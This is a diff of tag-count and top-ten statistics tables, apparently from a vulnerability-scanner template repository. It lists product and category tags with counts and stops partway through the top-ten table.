| 1 | | | | | | | | | +| macaddresslookup | 1 | | | | | | | | | +| accuweather | 1 | | | | | | | | | +| omniampx | 1 | | | | | | | | | +| verint | 1 | | | | | | | | | +| labstack | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| defi | 1 | | | | | | | | | +| hunter | 1 | | | | | | | | | +| jeecg-boot | 1 | | | | | | | | | +| musicstore | 1 | | | | | | | | | +| clearcom | 1 | | | | | | | | | +| tox | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| planon | 1 | | | | | | | | | +| harmony | 1 | | | | | | | | | +| locust | 1 | | | | | | | | | +| dasan | 1 | | | | | | | | | +| seopanel | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| msmtp | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| powerjob | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| gira | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| bible | 1 | | | | | | | | | +| iframe | 1 | | | | | | | | | +| pricing-deals-for-woocommerce | 1 | | | | | | | | | +| antsword | 1 | | | | | | | | | +| gsm | 1 | | | | | | | | | +| openshift | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| qualcomm | 1 | | | | | | | | | +| rconfig.exposure | 1 | | | | | | | | | +| extreme | 1 | | | | | | | | | +| suitecrm | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| bitcoinaverage | 1 | | | | | | | | | +| zenrows | 1 | | | | | | | | | +| fastvue | 1 | | | | | | | | | +| primefaces | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| surreal | 1 | | | | | | | | | +| stats | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| fortiap | 1 | | | | | | | | | +| satellite | 1 | | | | | | | | | +| pdflayer | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| commvault | 1 | | | | | | | | | +| ait-csv | 1 | | | | | | | | | +| proxycrawl | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| cybrotech | 1 | | | | | | | | | +| micro-user-service | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| webroot | 1 | | | | | | | | | +| phoronix | 1 | | | | | | | | | +| charity | 1 | | | | | | | | | +| routeros | 1 | | | | | | | | | +| zentao | 1 | | | | | | | | | +| prismaweb | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| mspcontrol | 1 | | | | | | | | | +| stridercd | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| wpcargo | 1 | | | | | | | | | +| eyoucms | 1 | | | | | | | | | +| mobile | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| currencyfreaks | 1 | | | | | | | | | +| tracing | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| monday | 1 | | | | | | | | | +| parse | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| uservoice | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| simpleclientmanagement | 1 | | | | | | | | | +| jupyterhub | 1 | | | | | | | | | +| opennms | 1 | | | | | | | | | +| ecsimagingpacs | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| sunflower | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| mitel | 1 | | | | | | | | | +| vivotex | 1 | | | | | | | | | +| pane | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| pan | 1 | | | | | | | | | +| flahscookie | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| opengraphr | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| jobs | 1 | | | | | | | | | +| novius | 1 | | | | | | | | | +| ocean-extra | 1 | | | | | | | | | +| sso | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| cve2000 | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| intellect | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| wp-fundraising-donation | 1 | | | | | | | | | +| profilegrid | 1 | | | | | | | | | +| google-earth | 1 | | | | | | | | | +| supersign | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| asa | 1 | | | | | | | | | +| sensei-lms | 1 | | | | | | | | | +| nconf | 1 | | | | | | | | | +| stored | 1 | | | | | | | | | +| optimizely | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| np | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| cve2002 | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| phpsocialnetwork | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| craftmypdf | 1 | | | | | | | | | +| webeditors | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| nirweb-support | 1 | | | | | | | | | +| d-link | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| hcl | 1 | | | | | | | | | +| siemens | 1 | | | | | | | | | +| dapr | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| alumni | 1 | | | | | | | | | +| chuangtian | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| db2 | 1 | | | | | | | | | +| etcd | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| securepoint | 1 | | | | | | | | | +| tekton | 1 | | | | | | | | | +| ipdiva | 1 | | | | | | | | | +| mappress | 1 | | | | | | | | | +| ipfind | 1 | | | | | | | | | +| foss | 1 | | | | | | | | | +| crestron | 1 | | | | | | | | | +| vault | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| edms | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| lob | 1 | | | | | | | | | +| nagvis | 1 | | | | | | | | | +| contentify | 1 | | | | | | | | | +| yishaadmin | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| zaver | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| maestro | 1 | | | | | | | | | +| officekeeper | 1 | | | | | | | | | +| ethereum | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| playsms | 1 | | | | | | | | | +| giphy | 1 | | | | | | | | | +| hugo | 1 | | | | | | | | | +| pichome | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| sls | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| garagemanagementsystem | 1 | | | | | | | | | +| biqsdrive | 1 | | | | | | | | | +| narnoo-distributor | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| helpdesk | 1 | | | | | | | | | +| xds | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| easync-booking | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| razer | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| olt | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| kerio | 1 | | | | | | | | | +| misconfiguration | 1 | | | | | | | | | +| cve2004 | 1 | | | | | | | | | +| struts2 | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| delta | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| contactform | 1 | | | | | | | | | +| buddy | 1 | | | | | | | | | +| coverity | 1 | | | | | | | | | +| richfaces | 1 | | | | | | | | | +| alltube | 1 | | | | | | | | | +| axxonsoft | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| gofile | 1 | | | | | | | | | +| ventrilo | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| kvm | 1 | | | | | | | | | +| sumowebtools | 1 | | | | | | | | | +| pagekit | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| curcy | 1 | | | | | | | | | +| fox | 1 | | | | | | | | | +| ictprotege | 1 | | | | | | | | | +| casemanager | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| secnet | 1 | | | | | | | | | +| patheon | 1 | | | | | | | | | +| pandorafms | 1 | | | | | | | | | +| acs | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| ptr | 1 | | | | | | | | | +| beego | 1 | | | | | | | | | +| aims | 1 | | | | | | | | | +| monitor | 1 | | | | | | | | | +| tiny | 1 | | | | | | | | | +| qvidium | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| deluge | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| mailwatch | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| cve2001 | 1 | | | | | | | | | +| vodafone | 1 | | | | | | | | | +| orbiteam | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| phpldap | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| nytimes | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| agentejo | 1 | | | | | | | | | +| sony | 1 | | | | | | | | | +| logger1000 | 1 | | | | | | | | | +| crystal | 1 | | | | | | | | | +| activeadmin | 1 | | | | | | | | | +| gemweb | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| lenovo | 1 | | | | | | | | | +| aero | 1 | | | | | | | | | +| pyspider | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| directum | 1 | | | | | | | | | +| aceadmin | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| kaes | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| phpMyChat | 1 | | | | | | | | | +| flyteconsole | 1 | | | | | | | | | +| ilch | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| harvardart | 1 | | | | | | | | | +| amcrest | 1 | | | | | | | | | +| pa11y | 1 | | | | | | | | | +| acunetix | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| newsletter | 1 | | | | | | | | | +| pfblockerng | 1 | | | | | | | | | +| unauthenticated | 1 | | | | | | | | | +| juniper | 1 | | | | | | | | | +| wago | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| flip | 1 | | | | | | | | | +| cmsimple | 1 | | | | | | | | | +| connectwise | 1 | | | | | | | | | +| auxin-elements | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| free5gc | 1 | | | | | | | | | +| patreon | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| segment | 1 | | | | | | | | | +| rainloop | 1 | | | | | | | | | +| ojs | 1 | | | | | | | | | +| panwei | 1 | | | | | | | | | +| duplicator | 1 | | | | | | | | | +| wallix | 1 | | | | | | | | | +| rsa | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| remedy | 1 | | | | | | | | | +| shibboleth | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| openvz | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| sv3c | 1 | | | | | | | | | +| advanced-booking-calendar | 1 | | | | | | | | | +| nj2000 | 1 | | | | | | | | | +| bootstrap | 1 | | | | | | | | | +| x-ray | 1 | | | | | | | | | +| revealjs | 1 | | | | | | | | | +| cgit | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| nagios-xi | 1 | | | | | | | | | +| soplanning | 1 | | | | | | | | | +| webshell | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| cve1028 | 1 | | | | | | | | | +| domino | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| zebra | 1 | | | | | | | | | +| paneil | 1 | | | | | | | | | +| academylms | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| tarantella | 1 | | | | | | | | | +| spartacus | 1 | | | | | | | | | +| nvrsolo | 1 | | | | | | | | | +| chronoforums | 1 | | | | | | | | | +| scraperbox | 1 | | | | | | | | | +| tracking | 1 | | | | | | | | | +| savepage | 1 | | | | | | | | | +| moveit | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| airtable | 1 | | | | | | | | | +| 3dprint | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| turbo | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| viaware | 1 | | | | | | | | | +| cuppa | 1 | | | | | | | | | +| projectdiscovery | 1 | | | | | | | | | +| boa | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| nodebb | 1 | | | | | | | | | +| smarterstats | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| passwordmanager | 1 | | | | | | | | | +| cdi | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| awx | 1 | | | | | | | | | +| phpwind | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| infinitewp | 1 | | | | | | | | | +| hotel | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| siteminder | 1 | | | | | | | | | +| wpify | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| h5s | 1 | | | | | | | | | +| clearfy-cache | 1 | | | | | | | | | +| zerodium | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| roteador | 1 | | | | | | | | | +| codis | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| m-files | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| screenshot | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| ray | 1 | | | | | | | | | +| iserver | 1 | | | | | | | | | +| intel | 1 | | | | | | | | | +| secui | 1 | | | | | | | | | +| tembosocial | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| shodan | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| cnvd2022 | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| bamboo | 1 | | | | | | | | | +| hanwang | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| zap | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| ubiquiti | 1 | | | | | | | | | +| ucp | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| director | 1 | | | | | | | | | +| aircube | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| connect-central | 1 | | | | | | | | | +| cql | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| qts | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| schneider | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| amt | 1 | | | | | | | | | +| ind780 | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| concrete5 | 1 | | | | | | | | | +| mcloud | 1 | | | | | | | | | +| rsvpmaker | 1 | | | | | | | | | +| adminset | 1 | | | | | | | | | +| intelliflash | 1 | | | | | | | | | +| behat | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| rss | 1 | | | | | | | | | +| lvm | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| spiderfoot | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| apim | 1 | | | | | | | | | +| acsoft | 1 | | | | | | | | | +| hdnetwork | 1 | | | | | | | | | +| opsgenie | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| woody | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| jumpserver | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| saml | 1 | | | | | | | | | +| persis | 1 | | | | | | | | | +| ncomputing | 1 | | | | | | | | | +| jhipster | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| editor | 1 | | | | | | | | | +| shell | 1 | | | | | | | | | +| improvmx | 1 | | | | | | | | | +| fortressaircraft | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| multisafepay | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| mi | 1 | | | | | | | | | +| securitytrails | 1 | | | | | | | | | +| avigilon | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| kubeview | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| dplus | 1 | | | | | | | | | +| system | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| smartping | 1 | | | | | | | | | +| audiocode | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| onlinefarm | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| prestahome | 1 | | | | | | | | | +| niagara | 1 | | | | | | | | | +| ruoyi | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| cloudera | 1 | | | | | | | | | +| sentinelone | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| fudforum | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| fastpanel | 1 | | | | | | | | | +| privx | 1 | | | | | | | | | +| scrapingant | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| ocomon | 1 | | | | | | | | | +| udraw | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| wp-cli | 1 | | | | | | | | | +| pods | 1 | | | | | | | | | +| directorist | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| peoplesoft | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| sh | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| room-alert | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| cluster | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| learnpress | 1 | | | | | | | | | +| wms | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| mesos | 1 | | | | | | | | | +| recovery | 1 | | | | | | | | | +| gpon | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| member-hero | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| pastebin | 1 | | | | | | | | | +| smartgateway | 1 | | | | | | | | | +| server | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| currencylayer | 1 | | | | | | | | | +| alchemy | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| retool | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| yarn | 1 | | | | | | | | | +| txt | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| webasyst | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| pghero | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| hostio | 1 | | | | | | | | | +| event | 1 | | | | | | | | | +| cuteeditor | 1 | | | | | | | | | +| pubsec | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| wget | 1 | | | | | | | | | +| sitemap | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| gerapy | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| barco | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| atvise | 1 | | | | | | | | | +| webviewer | 1 | | | | | | | | | +| awin | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| backupbuddy | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| lionwiki | 1 | | | | | | | | | +| wampserver | 1 | | | | | | | | | +| atg | 1 | | | | | | | | | +| tuxedo | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| bhagavadgita | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| teltonika | 1 | | | | | | | | | +| nownodes | 1 | | | | | | | | | +| hirak | 1 | | | | | | | | | +| backpack | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| neo4j | 1 | | | | | | | | | +| googlemaps | 1 | | | | | | | | | +| shortcode | 1 | | | | | | | | | +| markdown | 1 | | | | | | | | | +| supportivekoala | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| cudatel | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| c99 | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| metform | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| xyxel | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| machproweb | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| codestats | 1 | | | | | | | | | +| coinapi | 1 | | | | | | | | | +| buddypress | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| flywheel | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| chaos | 1 | | | | | | | | | +| debian | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| pyproject | 1 | | | | | | | | | +| terraboard | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| dqs | 1 | | | | | | | | | +| netbiblio | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| eyoumail | 1 | | | | | | | | | +| openmage | 1 | | | | | | | | | +| bibliosoft | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| nvrmini | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| gargoyle | 1 | | | | | | | | | +| omni | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| groupoffice | 1 | | | | | | | | | +| strider | 1 | | | | | | | | | +| xproxy | 1 | | | | | | | | | +| guppy | 1 | | | | | | | | | +| monitoring | 1 | | | | | | | | | +| airnotifier | 1 | | | | | | | | | +| juddi | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| polarisft | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| daily-prayer-time-for-mosques | 1 | | | | | | | | | +| neobox | 1 | | | | | | | | | +| bigfix | 1 | | | | | | | | | +| mailhog | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| pkp-lib | 1 | | | | | | | | | +| bscw | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| ninja-forms | 1 | | | | | | | | | +| tablereservation | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| open-school | 1 | | | | | | | | | +| scrapestack | 1 | | | | | | | | | +| flyway | 1 | | | | | | | | | +| userstack | 1 | | | | | | | | | +| shopify | 1 | | | | | | | | | +| emobile | 1 | | | | | | | | | +| cloudfoundry | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| qmail | 1 | | | | | | | | | +| webcenter | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| workreap | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| netweaver | 1 | | | | | | | | | +| encompass | 1 | | | | | | | | | +| xibocms | 1 | | | | | | | | | +| babel | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| phpminiadmin | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| zoneminder | 1 | | | | | | | | | +| rpcms | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| openpagerank | 1 | | | | | | | | | +| ez | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| openv500 | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| angularjs | 1 | | | | | | | | | +| grandnode | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| html2wp | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| catalogcreater | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| quixplorer | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| opennebula | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| front | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| xlight | 1 | | | | | | | | | +| drive | 1 | | | | | | | | | +| ti-woocommerce-wishlist | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| contentful | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e91f5c2085..6f439c586e 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 | -| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 | -| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 | -| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 | -| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | | -| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | | -| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | | -| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | | -| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | | -| tech | 349 | princechaddha | 153 | file | 78 | | | | | +| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 | +| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 | +| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 | +| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | +| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | | +| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | | +| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | | +| 